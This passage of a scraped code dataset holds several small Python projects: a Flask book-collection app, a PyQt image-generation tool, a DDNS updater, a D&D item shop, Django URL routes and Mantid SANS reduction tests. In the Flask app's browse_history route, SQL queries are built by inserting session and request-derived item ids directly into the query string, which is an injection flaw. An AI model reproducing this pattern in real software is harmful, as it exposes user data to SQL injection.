result\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nline_require=[]\r\nfp=open(\"./line_require.txt\", \"r\", encoding=\"utf-8\")\r\nfor line in fp:\r\n line=line.strip()\r\n if line==\"\": continue\r\n line_require.append(line.split(' '))\r\nfp.close()\r\n\r\nfp=open(\"./line.txt\", \"w\", encoding=\"utf-8\")\r\nfp_bad=open(\"./line_bad.txt\", \"w\", encoding=\"utf-8\")\r\nfor each in line_require:\r\n result=getLine(each[0], each[1])\r\n for line in result[0]:\r\n fp.write(line+'\\n')\r\n for line in result[1]:\r\n fp_bad.write(line+'\\n')\r\n fp.flush()\r\n fp_bad.flush()\r\n\r\nfp.close()\r\nfp_bad.close()\r\n","repo_name":"WanQiyang/12306_data","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"40215290552","text":"import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, jsonify, json\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom datetime import timedelta\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import *\n\n# Configure application\napp = Flask(__name__)\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n@app.before_request\ndef make_session_permanent():\n session.permanent = True\n app.secret_key = os.environ.get('super secret')\n #app.permanent_session_lifetime = timedelta(minutes=100000)\n\n# Ensure responses aren't cached\n\n\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# Configure CS50 Library to use SQLite database\nconnection = sqlite3.connect(\"bookify.db\", check_same_thread=False)\ncrsr = connection.cursor()\ndb = SQL(\"sqlite:///bookify.db\")\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n if not session.get('id'):\n if not session.get('temp_data'):\n initialize_visitor_data()\n print(f\"\\n\\n\\n\\n{session['temp_data']}\\n\\n\\n\")\n\n if request.method == \"POST\":\n keywords = request.form.get(\"search_words\")\n if not keywords:\n return render_template(\"index.html\")\n else:\n return search()\n else:\n return render_template(\"index.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/my_books\")\ndef my_books():\n if session.get('id') == True:\n favourites = db.execute(\"\"\"SELECT * FROM favourites\n JOIN items ON items.id = favourites.item_id\n WHERE user_id = ?\"\"\",\n session['id'])\n\n view_history = db.execute(\"\"\"SELECT * FROM items\n LEFT JOIN view_history ON items.id = view_history.item_id\n WHERE user_id = ?\n GROUP BY item_id\n ORDER BY view_history.id DESC LIMIT 20;\"\"\",\n session['id'])\n\n if request.args.get('filter_query'):\n query = json.loads(request.args.get('filter_query'))\n else:\n query = None\n\n items = {\n 'favourites': favourites,\n 'shelves': get_user_items(query),\n 'view hisrory': view_history\n }\n\n filter_attributes = {\n 'categories': arrange_attribute(get_user_items(query), 'category'),\n 'languages': arrange_attribute(get_user_items(query), 'language'),\n 'page counts': arrange_attribute(get_user_items(query), 'page_count'),\n 'release date': [int(x[:4]) for x in arrange_attribute(get_user_items(query), 'release_date') if x[0].isdigit()]\n }\n\n return render_template(\"My collection.html\", items=items, filter_attributes=filter_attributes)\n else:\n return 'None'\n\n\n@app.route(\"/append_permession\")\ndef append_permession():\n append_permession = request.args.get('order')\n if append_permession == 'y':\n session['temp_data'] = update_visitor_data()\n append_temp_to_usr_data(session[\"id\"])\n session['temp_data']['collection'].clear()\n session['temp_data']['favourites'].clear()\n return 'append_successful'\n else:\n session['temp_data']['collection'].clear()\n session['temp_data']['favourites'].clear()\n return 'discard'\n\n\n@app.route(\"/get_my_books_count\")\ndef get_my_books_count():\n if session.get('id'):\n items = db.execute(\"\"\"SELECT * FROM collection\n 
LEFT OUTER JOIN favourites ON collection.item_id = favourites.item_id\n                        WHERE collection.user_id = ?\"\"\", session['id'])\n    else:\n        session['temp_data'] = update_visitor_data()\n        items = set(list(session['temp_data']['collection'].keys()) + session['temp_data']['favourites'])\n\n    return str(len(items))\n\n\n@app.route(\"/browse_history\")\ndef browse_history():\n    if session.get('id'):\n        sql_query = f\"\"\"SELECT * FROM items\n                    LEFT JOIN view_history ON items.id = view_history.item_id\n                    WHERE user_id = {session['id']}\n                    GROUP BY item_id\n                    ORDER BY view_history.id DESC LIMIT 20;\"\"\"\n    else:\n        sql_query = f\"\"\"SELECT * FROM items\n                    WHERE id IN ({(', '.join(update_visitor_data()['view_history']))})\n                    GROUP BY id LIMIT 20;\"\"\"\n\n    browse_history = []\n    crsr.execute(sql_query)\n    items = crsr.fetchall()\n    columnNames = [column[0] for column in crsr.description]\n\n    for record in items:\n        browse_history.append(dict(zip(columnNames, record)))\n\n    return {'Browse history': browse_history}\n\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n    filters = {}\n    if request.method == \"POST\":\n        keywords = request.form.get(\"search_words\")\n        search_result = query_search(keywords)\n        return render_template(\"search.html\", results=search_result, page=1, keywords=keywords, str=str, post=True)\n    else:\n        filters = {\n            'relevance': request.args.get(\"relevance\"),\n            'search_by': request.args.get(\"search-by\"),\n            'readability': request.args.get(\"read-availability\"),\n            'print_type': request.args.get(\"print_typ\"),\n            'lang': request.args.get(\"lang\"),\n            'keywords': request.args.get(\"keywords\"),\n            'page': request.args.get(\"page\") if request.args.get(\"page\") else 1\n        }\n\n        search_result = query_search(filters['keywords'], **filters)\n        print(f\"\\n\\n\\n{filters}\\n\\n\\n\")\n        # return render_template(\"search.html\", results = search_result, page = filters['page'], keywords=filters['keywords'], str=str, post=True)\n        return render_template(\"search.html\", results=search_result, filters=filters, str=str, post=True)\n\n\n@app.route(\"/view_item\", methods=[\"GET\", \"POST\"])\ndef view_item():\n    item_id = request.args.get('volume_id')\n    add_item(item_id)\n    if session.get('id'):\n        db.execute(\"INSERT INTO view_history (user_id, item_id) VALUES(?, ?)\",\n                   session['id'], item_id)\n        return 'None'\n    else:\n        update_view_history(item_id)\n        session['temp_data'] = update_visitor_data()\n        return str(session['temp_data'])\n\n\n@app.route(\"/get_user_items\")\ndef get_user_items(query=None):\n    # query may arrive as a JSON string (from the route) or an already-parsed dict\n    if isinstance(query, str):\n        query = json.loads(query)\n    collection_items = {'To read': fill_shelf(1, query), 'Have read': fill_shelf(2, query), 'Reading': fill_shelf(3, query)}\n\n    return collection_items\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n    # Forget any user_id\n    if session.get('id'):\n        session.pop('id')\n    user_email = request.form['user-email'].lower()\n    password = request.form['user-password']\n    rows = db.execute(\"SELECT * FROM users WHERE email = ?\", user_email)\n    if not user_email or not password:\n        return 'Both fields are required'\n    elif len(rows) == 0 or not check_password_hash(rows[0][\"password\"], password):\n        return \"Invalid Email or Password\"\n    else:\n        session[\"id\"] = rows[0][\"id\"]\n        session[\"name\"] = rows[0][\"f_name\"]\n        if len(set(list(session['temp_data']['collection'].keys()) + session['temp_data']['favourites'])) > 0:\n            return 'append_permession'\n        return 'login_successful'\n\n\n@app.route(\"/logout\")\ndef logout():\n    \"\"\"Log user out\"\"\"\n    # 
Forget any user_id\n    session.pop('id')\n    return redirect('/')\n\n\n@app.route(\"/sign_up\", methods=[\"POST\"])\ndef sign_up():\n    \"\"\"Register user\"\"\"\n    if request.method == \"POST\":\n        form_inputs = {'first_name': None, 'last_name': None, 'email': None, 'b_date': None,\n                       'gender': None, 'password': None, 're_password': None}\n\n        form_inputs['first_name'] = request.form.get(\"first_name\")\n        form_inputs['last_name'] = request.form.get(\"last_name\")\n        form_inputs['email'] = request.form.get(\"email\").lower()\n        form_inputs['b_date'] = request.form.get(\"b_date\")\n        form_inputs['gender'] = request.form.get(\"gender\")\n        form_inputs['password'] = request.form.get(\"password\")\n        form_inputs['re_password'] = request.form.get(\"re_password\")\n        rows = db.execute(\"SELECT * FROM users WHERE email = ?\", form_inputs['email'])\n\n        for key, value in form_inputs.items():\n            if not value:\n                return form_inputs\n\n        if form_inputs['password'] != form_inputs['re_password']:\n            return (\"Password and confirm Password don't match\")\n        elif len(rows) == 1:\n            return (\"This Email is already registered\")\n        else:\n            # try:\n            db.execute(\"INSERT INTO users (f_name, l_name, b_date, gender, email, password) VALUES(?, ?, ?, ?, ?, ?)\",\n                       form_inputs['first_name'], form_inputs['last_name'], form_inputs['b_date'],\n                       form_inputs['gender'], form_inputs['email'], generate_password_hash(form_inputs['password'], method='pbkdf2:sha256',\n                                                                                           salt_length=8))\n\n            return redirect(\"/\")\n\n    else:\n        return render_template(\"register.html\")\n\n\n@app.route(\"/update_shelf\")\ndef update_shelf():\n    list_code = request.args.get('shelf')\n    print(f'\\n\\n\\n back shelf is {list_code}\\n\\n\\n')\n    item_id = request.args.get('volume_id')\n\n    if session.get('id'):\n        # check if item already exists in user collection\n        row_collection = db.execute(\"SELECT * FROM collection WHERE user_id = ? AND item_id = ?\",\n                                    session['id'], item_id)\n\n        # Add, delete or update item shelf based on list_code\n        if len(row_collection) == 0:\n            db.execute(\"INSERT INTO collection (user_id, item_id, list_id) VALUES(?, ?, ?)\",\n                       session['id'], item_id, list_code)\n            return '1'\n        elif row_collection[0]['list_id'] == int(list_code):\n            db.execute(\"DELETE FROM collection WHERE item_id = ? AND user_id = ?\", item_id, session['id'])\n            return '0'\n\n        else:\n            db.execute(\"UPDATE collection SET list_id = ? WHERE item_id = ? AND user_id = ?\",\n                       list_code, item_id, session['id'])\n            # return f\"{row_collection[0]}\"\n            return \"2\"\n    else:\n        shelf = update_visitor_shelf(item_id, list_code)\n        session['temp_data'] = update_visitor_data()\n        return shelf\n\n\n@app.route(\"/get_shelf\")\ndef get_shelf():\n    item_id = request.args.get('volume_id')\n\n    if session.get('id'):\n        user_id = session['id']\n\n        item = db.execute(\"SELECT * FROM collection WHERE item_id = ? AND user_id = ?\", item_id, user_id)\n\n        if len(item) != 0:\n            return str(item[0]['list_id'])\n        else:\n            return 'None'\n    else:\n        session['temp_data'] = update_visitor_data()\n        if item_id in session['temp_data']['collection'].keys():\n            return session['temp_data']['collection'][item_id]\n        else:\n            return 'None'\n\n\n@app.route(\"/update_favourits\")\ndef update_favourites():\n    item_id = request.args.get('volume_id')\n\n    if session.get('id'):\n        # check for item in user favourites\n        item = db.execute(\"SELECT * FROM favourites WHERE user_id = ? 
AND item_id = ?\",\n session['id'], item_id)\n # Add item to user favourites if it doesn't exist else remove it\n if len(item) == 0:\n db.execute(\"INSERT INTO favourits (user_id, item_id) VALUES(?, ?)\",\n session['id'], request.args.get('volume_id'))\n return '1'\n else:\n db.execute(\"DELETE FROM favourits WHERE item_id = ? AND user_id = ?\",\n request.args.get('volume_id'), session['id'])\n return '0'\n else:\n fav_bool = update_visitor_favourites(item_id)\n session['temp_data'] = update_visitor_data()\n print(f\"\\n\\n\\n{fav_bool}\\n\\n\\n\")\n return str(fav_bool)\n\n\n@app.route(\"/check_if_fav\")\ndef check_if_fav():\n item_id = request.args.get('volume_id')\n if session.get('id') == True:\n item = db.execute(\"SELECT * FROM favourites WHERE user_id = ? AND item_id = ?\",\n session['id'], item_id)\n # Add item to user favourites if it doesn't exist else remove it\n if len(item) == 0:\n return '0'\n else:\n return '1'\n else:\n if item_id in session['temp_data']['favourites']:\n print(f\"\\n\\n\\n{session['temp_data']['favourites']}\\n\\n\\n\")\n return '1'\n else:\n return '0'\n\n\n@app.route(\"/return_chart_data\")\ndef return_chart_data():\n item_id = request.args.get('item_id')\n\n item_shelves = {\n 'To read': 0,\n 'Have read': 0,\n 'Reading': 0\n }\n\n data = db.execute(\"\"\"SELECT list_id, COUNT(*) as counts FROM collection\n JOIN users ON users.id = collection.user_id\n WHERE item_id = ?\n GROUP BY list_id;\"\"\", item_id)\n\n for val in data:\n print(f\"\"\"\\n\\n{val}\\n\\n\"\"\")\n if val['list_id'] == 1:\n item_shelves['To read'] += int(val['counts'])\n elif val['list_id'] == 2:\n item_shelves['Have read'] += int(val['counts'])\n elif val['list_id'] == 3:\n item_shelves['Reading'] += int(val['counts'])\n\n return item_shelves","repo_name":"Khaled-Sherif/CS50-Final-Project-Bookify","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31552705166","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QListWidgetItem, QMainWindow, QListView, QVBoxLayout, QLCDNumber, QLineEdit, QGridLayout, QWidget, QAbstractButton, QPushButton, QLabel, QListWidget,QHBoxLayout, QComboBox, QTextEdit, QSlider , QGroupBox\nfrom PyQt5.QtGui import QPainter, QColor, QPen, QPainterPath, QImage, QPixmap, QIcon\nfrom PyQt5.QtCore import QSize, Qt, QPoint, QRect, QAbstractListModel, QModelIndex, QUrl, QByteArray\nfrom PyQt5.QtNetwork import QNetworkAccessManager, QNetworkRequest\nimport sketch\nimport sys\nimport requests\nimport json\nfrom PIL import Image\nfrom io import BytesIO\nimport os, io\nimport config\nimport replicate\nimport shutil\n\nos.environ[\"REPLICATE_API_TOKEN\"] = config.replicate_api_key\nAPI_URL = \"https://api-inference.huggingface.co/models/SG161222/Realistic_Vision_V1.4\"\nheaders = {\"Authorization\": f\"Bearer {config.huggingface_api_key}\"}\nos.makedirs('chatbot_responses', exist_ok=True)\nos.makedirs('bookmarks', exist_ok=True)\nos.makedirs('controlnet_responses', exist_ok=True)\n\nclass ChatBox(QGroupBox):\n def __init__(self, bookmarks):\n super().__init__(\"Inspiration\")\n self.chatMessageSend = QPushButton(\"Generate\")\n self.chatMessage = QLineEdit(\"\")\n self.chatMessage.setPlaceholderText(\"Describe here...\")\n self.bookmarks = bookmarks\n self.recentReponseImageDisplay = QLabel(\"\")\n self.recentReponseImageDisplay.setFixedSize(280, 280)\n self.recentReponseImageDisplay.setStyleSheet(\"QLabel { background-color: white; border: 1px solid #444444; }\")\n\n \n # recentReponseImageDisplayLayout = QHBoxLayout(self.recentReponseImageDisplay)\n # self.recentReponseImageDisplay.setLayout(recentReponseImageDisplayLayout)\n \n chatBoxLayout = QGridLayout(self)\n chatBoxLayout.addWidget(self.chatMessage, 1, 0, 1, 3)\n chatBoxLayout.addWidget(self.chatMessageSend, 1, 3)\n chatBoxLayout.addWidget(self.recentReponseImageDisplay, 0, 0, 1, 4)\n \n self.chatMessageSend.clicked.connect(self.add_group_box)\n \n list_widget = QListWidget()\n chatBoxLayout.addWidget(list_widget, 2, 0, 1, 4)\n\n self.list_widget = list_widget\n self.list_widget.setMinimumWidth(280)\n \n \n def generate_chatbot_response(self, message):\n clothing_description = message\n data = self.query(\"a full body, uncropped, head to toe photo of a single model wearing a \"+ clothing_description + \", facing the camera, simple background\")\n stream = io.BytesIO(data.content)\n img = Image.open(stream)\n img.save('./chatbot_responses/' + message + \".jpg\")\n return './chatbot_responses/' + message + \".jpg\"\n \n def query(self,payload):\n data = json.dumps(payload)\n response = requests.request(\"POST\", API_URL, headers=headers, data=data)\n return response\n \n def add_group_box(self):\n message = self.chatMessage.text()\n if message == \"\":\n return\n self.chatMessage.clear()\n response = self.generate_chatbot_response(message)\n #self.load_image(self.recentReponseImageDisplay, response, desired_width=280, desired_height=280)\n \n image = QImage(280,280, QImage.Format_RGB32)\n image.load(response)\n pixmap = QPixmap.fromImage(image)\n pixmap = pixmap.scaled(280, 280, Qt.AspectRatioMode.KeepAspectRatio)\n self.recentReponseImageDisplay.setPixmap(pixmap)\n \n # Create a new QGroupBox\n group_box = QGroupBox(self)\n group_box.setTitle(message)\n\n # Create a QHBoxLayout for the group box\n layout = QHBoxLayout(group_box)\n group_box.setLayout(layout)\n\n # Load and display the image\n 
self.load_image(group_box, response, desired_width=100, desired_height=100)\n\n # Create a QPushButton\n bookMarkSend = QPushButton(\"Save\")\n bookMarkSend.setFixedSize(100, 30)\n layout.addWidget(bookMarkSend)\n\n # Connect the button's clicked signal to the slot function\n bookMarkSend.clicked.connect(self.bookmark_clicked(message))\n \n # Create a QListWidgetItem and set the QGroupBox as its widget\n item = QListWidgetItem(self.list_widget)\n item.setSizeHint(group_box.sizeHint())\n self.list_widget.addItem(item)\n self.list_widget.setItemWidget(item, group_box)\n\n def load_image(self, group_box, image_path, desired_width, desired_height):\n # Create a QLabel widget\n label = QLabel(group_box)\n\n # Create a QPixmap object with the image\n pixmap = QPixmap(image_path)\n\n # Scale the image while preserving aspect ratio\n pixmap = pixmap.scaled(desired_width, desired_height, Qt.AspectRatioMode.KeepAspectRatio)\n\n # Set the image to the QLabel\n label.setPixmap(pixmap)\n\n # Add the QLabel to the QHBoxLayout\n layout = group_box.layout()\n layout.addWidget(label)\n\n def bookmark_clicked(self, fname):\n\n def add_to_bookmarks():\n # add to folder bookmarks\n shutil.copyfile('./chatbot_responses/' + fname + \".jpg\", './bookmarks/' + fname + \".jpg\")\n self.bookmarks.add_group_box(fname)\n return add_to_bookmarks","repo_name":"mwaliman/FashionCycle","sub_path":"chat_box.py","file_name":"chat_box.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"14300045849","text":"import json\nfrom random import shuffle\nfrom item import Item\nfrom typing import List\n\n\n# Return all items from JSON file as a set\ndef getItems(filePath=\"items.json\"):\n f = open(filePath, \"r\")\n rawList = json.load(f)\n itemSet = {Item(item) for item in rawList}\n f.close()\n return itemSet\n\n# Return a list of items based on rarity\n\n\ndef getItemsWithPrices(quantityGenerated: List[int]) -> List[Item]:\n items = getItems()\n rarities = [\"common\", \"uncommon\", \"rare\", \"veryrare\", \"legendary\"]\n output: List[Item] = []\n for i in range(len(quantityGenerated)):\n currentRarity = rarities[i]\n amountToGenerate = quantityGenerated[i]\n itemsAtCurrentRarity = [x for x in items if x.rarity == currentRarity]\n shuffle(itemsAtCurrentRarity)\n for j in range(amountToGenerate):\n item = itemsAtCurrentRarity[j]\n item.setPrice()\n output.append(item)\n\n return output\n\n\n# Saves Items to JSON Files\ndef writeItemsToJson(items=getItems()):\n f = open(\"items.json\", \"w\")\n # Convert Item object instances to Json Strings\n itemsDict = [item.toJson() for item in items]\n json.dump(itemsDict, f, indent=4)\n","repo_name":"aubenick/DnD-Shop-Script","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"1717570756","text":"# -*- coding: utf-8 -*-\nfrom DNS import dnspod, dynv6\nimport config_func\nfrom time import sleep\nfrom command import ipv6, reset\nimport os\n\n\ndef start(subdomain, time):\n try:\n file = open('conf/ddns.conf', 'r')\n file.close()\n except FileNotFoundError:\n try:\n os.mkdir('conf')\n except FileExistsError:\n pass\n finally:\n os.system('echo # ddns-conf>conf/ddns.conf')\n reset.reset()\n\n config = config_func.read_config('conf/ddns.conf')\n for key, value in config.items():\n if value == '':\n print(\"请完成配置 \"+key)\n return 0\n\n value = ipv6.get_global_ipv6()\n recordid = 0\n if config['dns'] == 'dnspod':\n for record in dnspod.dnspod_get_record_list_noprint(config['domain'], config['secretid'], config['secretkey']).RecordList:\n if record.Name == subdomain and record.Type == 'AAAA':\n print('已存在该记录')\n recordid = record.RecordId\n dnspod.dnspod_change_record(config['domain'], config['secretid'], config['secretkey'], recordid, value, subdomain)\n break\n else:\n continue\n if recordid == 0:\n print('不存在该记录,创建新记录')\n recordid = dnspod.dnspod_add_record(config['domain'], config['secretid'], config['secretkey'], value, subdomain).RecordId\n elif config['dns'] == 'dynv6':\n dynv6.add_record(subdomain, config['api_token_dynv6'], config['domain'], value)\n\n\n while 1:\n value_tmp = ipv6.get_global_ipv6()\n if value != value_tmp:\n print('IPV6已改变')\n value = value_tmp\n if config['dns'] == 'dnspod':\n dnspod.dnspod_change_record(config['domain'], config['secretid'], config['secretkey'], recordid, value, subdomain)\n elif config['dns'] == 'dynv6':\n dynv6.add_record(subdomain, config['api_token_dynv6'], config['domain'], value)\n else:\n print(\"未改变\")\n sleep(int(time))\n","repo_name":"QLYZWD/ddns-q","sub_path":"command/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"3280616865","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n self.current_sum = 0\n self.bstToGstUtil(root)\n return root\n\n def bstToGstUtil(self, root):\n if not root: return\n self.bstToGstUtil(root.right)\n self.current_sum += root.val\n root.val = self.current_sum\n self.bstToGstUtil(root.left)\n","repo_name":"pqnguyen/CompetitiveProgramming","sub_path":"platforms/leetcode/BinarySearchTreetoGreaterSumTree.py","file_name":"BinarySearchTreetoGreaterSumTree.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"12192040623","text":"#task7-4\nwhile True:\n pizza_topping = input(\"Please enter pizza topping or 'quit' to exit: \")\n if pizza_topping.lower() == 'quit':\n break\n else:\n print(f\"You have added '{pizza_topping}' topping.\")\n\n#task7-5\nprint(\"\\n\")\nwhile True:\n age = int(input(\"Enter age for ticket price: \"))\n if age <=3:\n print(\"Ticket is free.\")\n elif age < 12:\n print(\"Ticket is 10$\")\n else:\n print(\"Ticket is 15$\")","repo_name":"Gimkk/Python","sub_path":"crash_course/chapter_7/while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"35032655948","text":"from django.urls import path\nfrom .views import *\n\n\n\nurlpatterns=[\n path('signin/',signin,name='signin'),\n path('signup/',signup,name='signup'),\n path('seller_index/',seller_index,name='seller_index'),\n path('form/',form,name='form'),\n path('table/',table,name='table'),\n path('seller_otp/',seller_otp,name='seller_otp'),\n path('',seller_index,name='seller_index'),\n path('seller_edit_profile/',seller_edit_profile,name='seller_edit_profile'),\n path('seller_logout/',seller_logout,name='seller_logout'),\n path('my_product/',my_product,name='my_product'),\n path('add_product/',add_product,name='add_product'),\n path('edit_product/',edit_product,name='edit_product'),\n path('delete_product/',delete_product,name='delete_product'),\n path('my_order/',my_order,name='my_order'),\n path('change_status/',change_status,name='change_status')\n]","repo_name":"Papuku/papu_eccommerce","sub_path":"seller/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"42004253626","text":"from django import template\nfrom django.template.loader import render_to_string\n\nfrom invite.models import Invitation, make_token\nfrom invite.forms import InviteForm\n\nregister = template.Library()\n\nclass InviteFormNode(template.Node):\n def __init__(self, object_expr=None):\n self.object_expr = object_expr\n\n def get_target(self, context):\n return self.object_expr.resolve(context) if self.object_expr else None\n\n def render(self, context):\n user = context[\"request\"].user\n content_object = self.get_target(context)\n invite = Invitation(user=user, content_object=content_object) if content_object else Invitation(user=user)\n form = InviteForm(instance=invite)\n context.push() #move the context stack forward so our variable names don't conflict\n value = render_to_string(\"invite/invite_form.html\", {\"form\":form}, context)\n context.pop()\n return value\n\n@register.tag\ndef get_invite_form(parser, token):\n \"\"\"\n Get a form to send an invite to that is optionally related to an object\n\n Syntax::\n {% get_invite_form %}\n or\n {% get_invite_form for [object] %}\n \"\"\"\n tokens = token.split_contents()\n if len(tokens) > 3:\n raise template.TemplateSyntaxError(\"Invalid Syntax\")\n if len(tokens) == 1:\n return InviteFormNode()\n if tokens[1] != \"for\":\n raise template.TemplateSyntaxError(\"Second argument in %r tag must be 'for'\" % tokens[0])\n return InviteFormNode(parser.compile_filter(tokens[2]))\n","repo_name":"allianceforclimateprotection/repowerathome","sub_path":"invite/templatetags/invites.py","file_name":"invites.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"32138425592","text":"import stresstesting\nfrom mantid.simpleapi import * \nfrom mantid.api import Workspace\nfrom ISISCommandInterface import *\nimport numpy\nimport unittest\n\n## export PYTHONPATH=/apps/workspace/mantid_debug/bin/:/apps/mantid/systemtests/StressTestFramework/:/apps/mantid/mantid/Code/Mantid/scripts/SANS/:/apps/mantid/mantid/Code/Mantid/scripts/reduction\n\n\n\"\"\"\nAllowing the reduction to use already loaded workspace will make it easier to \ndeal with event mode and producing new workspaces for the reduction of data.\nTill 06/2013 the reload option was available, but not implemented. \n\nIn order to protect the system, it is suggested the following integration tests\nto ensure that allowing workspaces as input to the reduction will not disturb the \nreduction itself, and it is safe.\n\nLOQReductionShouldAcceptLoadedWorkspace ensure some requirements for the reloading. \nSANS2DReductionShouldAcceptLoadedWorkspace and SANS2DReductionShouldAcceptLoadedWorkspaceRawFile\napply the same requirements for SANS2D instruments. \n\n\nLOQReductionShouldAcceptLoadedWorkspaceStressTest, SANS2DReductionShouldAcceptLoadedWorkspaceStressTest\nand SANS2DReductionShouldAcceptLoadedWorkspace are wrappers to make unittest.TestCase to fit the stresstesting\nframework. \n\nThe other tests are here to ensure the results of providing directly workspaces will be the same that loading\nfrom files. \n\n\"\"\"\n\nclass LOQReductionShouldAcceptLoadedWorkspace(unittest.TestCase):\n \"\"\"\n The following tests is to ensure that the reload obeys the following requirement: \n * If reload is True the real data will be always reloaded from the file\n * If reload is False, it will be used, if it pass the following tests: \n * The instrument components have not been moved\n \"\"\"\n def setUp(self):\n self.load_run = '54431.raw'\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n MaskFile(\"MASK.094AA\")\n self.control_name = '54431main_1D_2.2_10.0'\n self.inst_comp = 'main-detector-bank'\n\n def tearDown(self):\n mtd.clear()\n\n def test_accept_loaded_workspace_only_if_reload_false(self):\n my_workspace = Load(self.load_run)\n #set the value for my_workspace to ensure it is the one used\n aux = my_workspace.dataY(0)\n aux[10]=5\n my_workspace.setY(0,aux)\n # ask to use the loaded workspace\n AssignSample(my_workspace,reload=False)\n \n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n \n self.assertTrue(ws_name, my_workspace.name())\n \n self.assertTrue(my_workspace.dataY(0)[10],5)\n # ensure that it is able to execute the reduction\n Reduce()\n self.assertTrue(self.control_name in mtd)\n\n\n def test_accept_loaded_workspace_but_reload_the_data_file_if_reload_true(self):\n my_workspace = Load(self.load_run)\n #set the value for my_workspace to ensure it is the one used\n aux = my_workspace.dataY(0)\n aux[10]=5\n my_workspace.setY(0,aux)\n # ask to use the loaded workspace\n AssignSample(my_workspace,reload=True)\n \n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n # it is different, because, it will compose the name using its rule, \n # wich, for sure, will be different of my_workspace.\n self.assertFalse(ws_name==my_workspace.name())\n self.assertFalse(mtd[ws_name].dataY(0)[10]==5)\n # it is not necessary to ensure the Reduce occurs\n\n def test_should_not_accept_loaded_workspace_if_moved(self):\n my_workspace = Load(self.load_run)\n MoveInstrumentComponent(my_workspace,self.inst_comp,X=2,Y=1,Z=0)\n ## attempt to use a workspace that has been moved\n 
self.assertRaises(RuntimeError, AssignSample, my_workspace, False)\n\n\n def test_should_not_accept_loaded_workspace_if_moved_2(self):\n # assign sample loads and move the workspace to the defined center\n AssignSample(self.load_run)\n\n # this makes it load this worksapce and generates an output workspace\n ws_name = ReductionSingleton().get_sample().get_wksp_name()\n # the workspace is renamed, so it seems another workspace\n my_workspace = RenameWorkspace(ws_name)\n ## trying to assing it again to AssingSample must fail\n self.assertRaises(RuntimeError, AssignSample, my_workspace, False)\n\nclass SANS2DReductionShouldAcceptLoadedWorkspace(LOQReductionShouldAcceptLoadedWorkspace):\n def setUp(self):\n self.load_run = '2500.nxs'\n config[\"default.instrument\"] = \"SANS2D\"\n SANS2D()\n MaskFile(\"MASKSANS2D_094i_RKH.txt\")\n self.control_name = '2500front_1D_4.6_12.85'\n self.inst_comp = 'rear-detector'\n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceRawFile(SANS2DReductionShouldAcceptLoadedWorkspace):\n def setUp(self):\n SANS2DReductionShouldAcceptLoadedWorkspace.setUp(self)\n self.load_run = '5547.raw'\n self.control_name = '5547front_1D_4.6_12.85'\n\nclass LOQReductionShouldAcceptLoadedWorkspaceStressTest(stresstesting.MantidStressTest):\n cl = LOQReductionShouldAcceptLoadedWorkspace\n def runTest(self):\n self._success = False\n # Custom code to create and run this single test suite\n suite = unittest.TestSuite()\n suite.addTest( unittest.makeSuite(self.cl, \"test\"))\n runner = unittest.TextTestRunner()\n # Run using either runner\n res = runner.run(suite)\n if res.wasSuccessful():\n self._success = True\n\n def validate(self):\n return self._success \n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceStressTest(LOQReductionShouldAcceptLoadedWorkspaceStressTest):\n cl = SANS2DReductionShouldAcceptLoadedWorkspace\n\nclass SANS2DReductionShouldAcceptLoadedWorkspaceStressTest2(LOQReductionShouldAcceptLoadedWorkspaceStressTest):\n cl = SANS2DReductionShouldAcceptLoadedWorkspaceRawFile\n\n\nclass LOQTransFitWorkspace2DWithLoadedWorkspace(stresstesting.MantidStressTest):\n def runTest(self):\n config[\"default.instrument\"] = \"LOQ\"\n LOQ()\n MaskFile('MASK.094AA')\n 